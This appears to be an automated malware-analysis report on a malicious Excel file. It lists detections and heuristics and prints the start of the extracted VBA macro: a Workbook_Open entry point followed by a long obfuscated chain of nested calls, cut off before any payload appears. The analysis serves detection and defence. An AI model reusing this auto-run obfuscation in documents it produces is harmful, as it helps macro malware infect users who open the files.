Malware Insights
The sample is an Excel document containing VBA macros, specifically a Workbook_Open macro that calls the Shell() function. This indicates an attempt to execute arbitrary code. The document body displays a fake error message in Turkish, prompting the user to enable macros, which is a common social engineering tactic for malicious documents. The ClamAV detection name 'Xls.Malware.Valyria-10036514-0' further supports its malicious nature. The VBA script's obfuscated nature and the use of Shell() suggest it likely downloads and executes a second-stage payload.
Heuristics (5)
- ClamAV: Xls.Malware.Valyria-10036514-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Valyria-10036514-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16830 bytes |

SHA-256 of macros.bas: 1c5aec867a7b504302aa71d7c9a46dc2d10ec59146c6e373789133486ac64068
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "VA"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "AV"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Static Sub worKBook_opeN(): Call JrsAR: End Sub
Static Function JrsAR() As Currency
Call peJit
End Function
Sub peJit()
Call jnkhz
End Sub
Sub jnkhz()
Call ewKfF
End Sub
Function ewKfF() As Boolean
Call KjbNg
End Function
Function KjbNg() As String
Call EsCMm
End Function
Function EsCMm()
Call lfTuO
End Function
Function lfTuO() As Date
Call foutT
End Function
Static Function foutT() As String
Call ZwUrZ
End Function
Sub ZwUrZ()
Call GklZB
End Sub
Sub GklZB()
Call AsMYG
End Sub
Function AsMYG() As Currency
Call ggdGi
End Function
Static Function ggdGi() As Integer
Call aoEFo
End Function
Function aoEFo() As Single
Call VxeDt
End Function
Sub VxeDt()
Call dbNSd
End Sub
Function dbNSd() As Byte
Call XjoQj
End Function
Static Function XjoQj() As Variant
Call DXFzK
End Function
Static Sub DXFzK()
Call yffxQ
End Sub
Sub yffxQ()
Call soGwW
End Sub
Static Sub soGwW()
Call YbXex
End Sub
Static Sub YbXex()
Call SkycD
End Sub
Function SkycD() As Boolean
Call zXPKf
End Function
Function zXPKf() As Double
Call tgqJk
End Function
Static Function tgqJk()
Call aTHrM
End Function
Static Sub aTHrM()
Call UchqS
End Sub
Sub UchqS()
Call OkIoX
End Sub
Static Sub OkIoX()
Call uYZWz
End Sub
Static Function uYZWz() As Date
Call phAVF
End Function
Function phAVF() As Currency
Call VURDh
End Function
Function VURDh() As String
Call PdrBm
End Function
Static Function PdrBm() As Date
Call KlSAs
End Function
Static Sub KlSAs()
Call qZjiU
End Sub
Sub qZjiU()
Call khKhZ
End Sub
Static Sub khKhZ()
Call RVbPB
End Sub
Static Sub RVbPB()
Call nTTuO
End Sub
Static Sub nTTuO()
Call hcutU
End Sub
Static Function hcutU() As Double
Call NQLbw
End Function
Private Function NQLbw() As Object
Call HYlZB
End Function
Static Function HYlZB() As Boolean
Call oMDHd
End Function
Static Sub oMDHd()
Call iUdGj
End Sub
Private Sub iUdGj()
Call cdEEo
End Sub
Static Sub cdEEo()
Call JQVnQ
End Sub
Static Sub JQVnQ()
Call DZvlW
End Sub
Static Function DZvlW() As Variant
Call jMNTy
End Function
Private Function jMNTy() As Date
Call eVnSD
End Function
Static Function eVnSD() As Currency
Call YdOQJ
End Function
Static Sub YdOQJ()
Call ERfyl
End Sub
Static Sub ERfyl()
Call zZFxq
End Sub
Static Sub zZFxq()
Call fNXfS
End Sub
Static Function fNXfS() As String
Call ZVxeY
End Function
Static Function ZVxeY()
Call TeYcd
End Function
Private Function TeYcd() As Byte
Call ASpKF
End Function
Static Function ASpKF() As String
Call wQInz
End Function
Private Sub wQInz()
Call cEZWa
End Sub
Static Sub cEZWa()
Call WMAUg
End Sub
Private Sub WMAUg()
Call DARCI
End Sub
Private Function DARCI() As Object
Call xIsBN
End Function
Static Function xIsBN() As Boolean
Call rRSzT
End Function
Private Function rRSzT() As String
Call YEkiv
End Function
Private Sub YEkiv()
Call SNKgA
End Sub
Private Sub SNKgA()
Call yAbOc
End Sub
Static Function yAbOc() As Double
Call tJCNi
End Function
Private Function tJCNi()
Call nRcLn
End Function
Private Function nRcLn() As Date
Call TFutP
End Function
Static Function TFutP() As Currency
Call ONUsV
End Function
Private Function ONUsV()
Call uBlax
End Function
Private Sub uBlax()
Call oKMZC
End Sub
Private Sub oKMZC()
Call KIEEQ
End Sub
Private Sub KIEEQ()
Call rwVmr
End Sub
Sub rwVmr()
Call lEwkx
End Sub
Private Sub lEwkx()
Call RsNTZ
End Sub
Private Function Rs
... (truncated)